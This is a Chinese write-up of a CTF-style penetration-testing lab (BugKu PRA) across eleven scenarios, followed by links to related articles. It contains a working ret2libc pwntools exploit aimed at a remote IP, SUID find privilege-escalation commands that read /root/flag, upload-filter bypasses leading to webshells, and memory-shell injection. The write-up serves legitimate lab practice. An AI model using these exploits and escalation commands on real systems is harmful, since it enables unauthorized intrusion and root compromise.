BugKu -- PRA -- 渗透测试1
写在前面
这个靶场之前走的时候确实没搞下来,里面涉及到pwn的知识,我是完全不会,所以也是参考了大佬的文章,后面会附上大佬博客的链接。
信息搜集一波
这里先信息搜集一波,先扫下目录和端口。
场景1
场景1还是很简单的,直接查看源代码,拉到最下面就能看到第一个flag
场景2
根据上一个flag的提示,应该是需要找到网站后台然后登陆进去,在通过之前扫过目录,判断后台为/admin
使用弱口令admin admin直接登录,这里其实就是随手试了一下,如果没试出来,也是可以爆破的。
在网站配置中的基本设置里,找到第二个flag
场景3
通过翻找网站,在内容管理 -> 模型管理中选择添加模型,找到一个上传点,尝试上传php
发现说上传的后缀为空了,那这里就是把我们的php后缀改为了空,我们尝试双写绕过
提示我们不能上传,经过各种翻找,发现网站在网站设置 -> 基本设置里是可以更改上传后缀的
添加php后缀
再次上传,上传成功,并返回了上传路径,这里有个点很奇怪,就是使用pphphp就能绕后,phphpp就不行。
上传后,成功拿到webshell
根据上一题的提示 /home,在/home/ctf/下查看第三个flag
场景4
根据上一题的提示,和数据库有关,找到数据库文件
通过webshell工具直接连接上数据库,得到第四个flag
场景5
这道题确实不大会,这里直接借用大佬的脚本,具体可以参考大佬的博客
from pwn import *from LibcSearcher import *context.log_level = 'debug'r = remote('47.122.10.163',9999)elf = ELF('./main')main_addr = elf.sym['main']
write_plt = elf.plt['write']
write_got = elf.got['write']print(write_got)ppp_ret = 0x08048559payload = b'A'*(0x24 + 4) + p32(write_plt) + p32(ppp_ret) + p32(1) + p32(write_got) + p32(8) + p32(main_addr)r.sendlineafter('plz input your name:\n',payload)write_addr = u32(r.recv(4))print(hex(write_addr))libc = LibcSearcher('write',write_addr)libc_base = write_addr - libc.dump('write')system_addr = libc_base + libc.dump('system')binsh_addr = libc_base + libc.dump('str_bin_sh')print(hex(system_addr),hex(binsh_addr))payload = b'A'*40 +p32(system_addr) + b'a'*4 + p32(binsh_addr)r.sendlineafter('plz input your name:\n',payload)r.interactive()
运行脚本后选择 3 ,获取root权限
在root目录下得到flag
场景6
给出提示8080,咱们之前扫描端口也扫到了8080,尝试访问
扫描网站目录
访问robots.txt文件,得到flag
场景7
在登录界面输入密码进行尝试
发现rememberMe=deleteMe特征,该特征是shiro框架,直接利用工具
利用工具注入内存马
连接内存马成功
在home目录下,得到flag
场景8
到了这里也没什么提示,大概率应该就是提权了,那么首先就先试试suid提权
find / -perm -4000 -type f 2>/dev/null
发现有find,直接利用find提权,这里直接利用已有的flag文件进行提权
find flag -exec whoami \;
查看root目录下的flag
find flag -exec cat /root/flag \;
场景9
提示看看内网,那咱们就回到刚才的webshell上,看看内网都有哪些地址存活,这里发现这台服务器上就有nmap,直接扫该网段就行,首先查看该网段
利用nmap扫描
nmap -sV -T 4 -o re.txt 192.168.0.0/24
这里我们直接选择0.4这个地址渗透,首先需要做内网穿透,这里用frp或者nps什么的都可以,操作都比较简单,这里就不赘述了,直接连接
这里还是常规的扫了下目录,没有什么有用的东西,尝试输入一个不存在的路径(这种方法一般就是用来判断tp的),发现确实是thinkphp框架
直接上工具
这里有一个数据库的信息泄露,需要记一下,直接注入内存马
在上一级目录得到flag
场景10
根据上面的提示,是数据库,刚刚是有数据库信息的,这里有个技巧的,刚刚用工具getshell之后,用的是蚁剑连接,但是他不能直接连数据库,所以我用蚁剑上传一个哥斯拉的马,然后用哥斯拉再连接
场景11
最后一道题提示权限貌似不够,所以还是提权,这里用到的是CVE-2021-3156,内核提权,这里我使用的非交互的poc,链接,直接上传,输入make编译后,查看root目录下的flag
BugKu -- PRA -- 渗透测试1相关推荐
- 渗透测试常用在线工具汇总
网站导航 编码/加密 CyberChef:编解码及加密,可本地部署 https://github.com/gchq/CyberChef OK Tools在线工具:https://github.com/ ...
- 渗透测试-最全Web 渗透测试信息搜集-CheckList
干货 | 最全Web 渗透测试信息搜集-CheckList 文章目录 干货 | 最全Web 渗透测试信息搜集-CheckList 前言 1.获取真实IP 2.如何判断是否是CDN 使用ping域名判断 ...
- 记一次初级渗透测试模拟过程
0x00 前言 网络安全攻防赛是一种国际流行的竞技模式,自2014年在国内升温,发展到现在,深受各大高校和安全企业的青睐.参赛者在竞技过程中能够更大的限度的收获专业知识.激发潜能.为了让更多人切身体会 ...
- 干货丨渗透测试常用方法总结,大神之笔!
干货丨渗透测试常用方法总结,大神之笔! 一.渗透流程 信息收集 漏洞验证/漏洞攻击 提权,权限维持 日志清理 信息收集 一般先运行端口扫描和漏洞扫描获取可以利用的漏洞.多利用搜索引擎 端口扫描 有授权 ...
- 看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-1
Vulnhub靶机DriftingBlues-1渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机漏洞详解: ①:信息收集: ②:目录爆破: ③:暴力破解: ④:提权 ...
- 查询Master下的系统表和系统视图获取数据库的信息和简单的渗透测试
在SQL中可以通过查询Master下的系统表(sys)和系统视图(information_schema)获取数据库的信息.SQL2000和SQL2005的结构略有不同. 系统表结构参考系统表详细说明. ...
- 渗透测试:正义黑客的渗透测试以及该过程和黑客活动的区别
2019独角兽企业重金招聘Python工程师标准>>> 渗透测试是正义黑客大展身手的地方.他们可以对漏洞评估中识别出的许多漏洞进行测试,以量化该漏洞带来的实际威胁和风险. 当正义黑客 ...
- 渗透测试是否需要学习Linux
渗透测试是一种利用模拟黑客攻击的手段,来评估生产系统的安全性能,用黑客惯用的破坏攻击方式,行的却是维护安全之事,也就是大家所说的白帽黑客.白帽黑客通常受雇于各大公司,是维护网络与计算机安全的主要力量. ...
- 暗渡陈仓:用低消耗设备进行破解和渗透测试1.2.2 渗透测试工具集
1.2.2 渗透测试工具集 Deck包含大量的渗透测试工具.设计理念是每个可能会用到的工具都应该包含进来,以确保在使用时无须下载额外的软件包.在渗透测试行动中给攻击机安装新的软件包很困难,轻则要费很大 ...
最新文章
- C++ explicit关键字
- JSR-303校验类型
- 网易NAPM Andorid SDK实现原理--转
- JQuery学习系列(九)AJAX
- emq数据储存到mysql_EMQ X 规则引擎系列(三)存储消息到 InfluxDB 时序数据库
- fileUpload 文件上传
- 计算机广告制作未来发展还行吗,计算机多媒体设计专业和广告设计制作那个好...
- LeetCode 121:买卖股票的最佳时机 思考分析
- JS-深入理解继承(非class方式与class继承)
- MySQL中通配类型各自作用_在Access数据库中。在查找操作中,通配符*、?与#各有什么作用?...
- 架构设计(2)---分布式架构的演进过程
- 关于excel表的生成
- SaaS 公司如何应对 On-Call 挑战?
- http与https的作用与区别
- 【jsp】JSTL标签大全详解
- SharePoint And Ajax Technology(2):Ajax Control Toolkit学习
- CANOe系列讲解 - CANoe发送UDS诊断帧
- springboot官方文档PDF下载指北
- 电脑带不动虚幻引擎渲染卡顿怎么办?本文给你支招
- Android自定义人脸识别框,android自定义虹软人脸识别框/人脸抓拍框/人脸追踪框...
热门文章
- mysql在windows上的安装文件_MySQL安装详细图解,在Window上的详细安装步骤图解
- JAVA开发工具包——KDK环境配置
- 用java的robot类以及Gui 制作一个游戏(阴阳师)脚本
- 计算机科学拔尖基地,数据帝| 12所高校“计算机科学”入选教育部基础学科拔尖学生培养计划2.0基地...
- javaweb JAVA JSP财务管理系统记账管理系统jsp财务管理网站(理财系统财务管理系统)源码
- ValueError: maximum supported dimension for an ndarray is 32, found 256
- HTTP入门:长连接、短连接及持久连接介绍
- census变换理解
- ROS编译遇到的【bug】No package ‘orocos-bfl‘ found
- 在编译robot_pose_ekf时报错no module orocos-bfl